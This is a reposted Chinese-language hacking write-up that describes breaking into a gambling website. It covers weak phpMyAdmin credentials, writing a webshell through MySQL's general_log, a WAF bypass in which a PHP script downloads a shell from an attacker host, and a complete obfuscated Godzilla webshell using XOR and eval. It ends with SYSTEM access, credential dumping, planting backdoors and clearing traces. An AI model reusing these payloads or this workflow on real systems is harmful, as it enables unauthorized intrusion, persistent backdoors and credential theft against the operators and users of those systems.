確定目標

收集信息

x.x.x.x

首先常規測試方法一頓懟，目錄掃描，端口掃描，js文件，中間件，指紋識別，反正該上的都上。。。

隨手加個路徑，報錯了，當看到這個界面我瞬間就有思路了

為什么這么說呢，因為之前我就碰見過這樣的網站報錯，這是一個php集成環境，叫upupw，跟phpstudy是一樣的

upupw? --> pmd

phpstudy --> phpmyadmin

突破點

這個集成環境包也有個phpinfo的頁面，跟數據庫管理界面

u.php

?

測試一下弱口令

root/root

?

連接成功后就可以看到phpinfo的頁面

好了現在問題變成phpmyadmin拿shell

getshell

三步拿shell

set global general_log='on'; SET global general_log_file='D:/xxxx/WWW/cmd.php' SELECT '<?php assert($_POST["cmd"]);?>';

當執行第三步的時候頁面卡在執行中。。。沒有反應 瞬間感覺不對，可能存在waf

換了個免殺馬試試，先寫到txt里邊看看成功與否

沒有任何問題，下面直接寫入php文件

?

可以寫入，直接去連接shell

果然有waf,當時寫入的時候就感覺到了，不免殺的shell，sql語句執行不了

繞過waf

懟了半天都不知道是什么鬼waf，用下載文件試試
為了避免攔截php代碼的waf，我這里遠程下載的腳本是利用JavaScript轉寫php

SET global general_log_file='C:/Users/Administrator/Desktop/UPUPW_AP5.5_64/htdocs/11.php'; SELECT '<script language="php"> $a="http://x.x.x.x:81/shell.txt";$b="file"."_g"."et_"."contents";$b = $b($a);file_put_contents("shell.php",$b); </script>'

訪問11.php 就會生成shell.php
這里的shell也是用了哥斯拉的免殺shell

<?phpsession_start();@set_time_limit(0);@error_reporting(0);function E($D,$K) {for ($i=0;$i<strlen($D); $i++) {$D[$i] = $D[$i]^$K[$i+1&15];}return $D;}function Q($D) {return base64_encode($D);}function O($D) {return base64_decode($D);}$P='pass';$V='payload';$T='3c6e0b8a9c15224a';if (isset($_POST[$P])) {$F=O(E(O($_POST[$P]), $T));if (isset($_SESSION[$V])) {$L=$_SESSION[$V];$A=explode('|', $L);class C{public function nvoke($p) {eval($p."");}}$R = new C();$R->nvoke($A[0]);echo substr(md5($P.$T), 0, 16);echo Q(E(@run($F),$T));echo substr(md5($P.$T), 16);} else {$_SESSION[$V]=$F;}}

嘗試了這么多次

進程里沒有waf進程

權限是system

脫源碼

上傳抓密碼工具，直接獲取管理密碼,登上服務器

?

?

留后門，清理痕跡

多留幾個后門，萬一被刪

?

這個網段還有這么多機器

源碼

打開源碼才發現waf是360webscan

?

?

創作挑戰賽新人創作獎勵來咯，堅持創作打卡瓜分現金大獎

總結

以上是生活随笔為你收集整理的实战|简单绕过waf拿下赌博网站的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。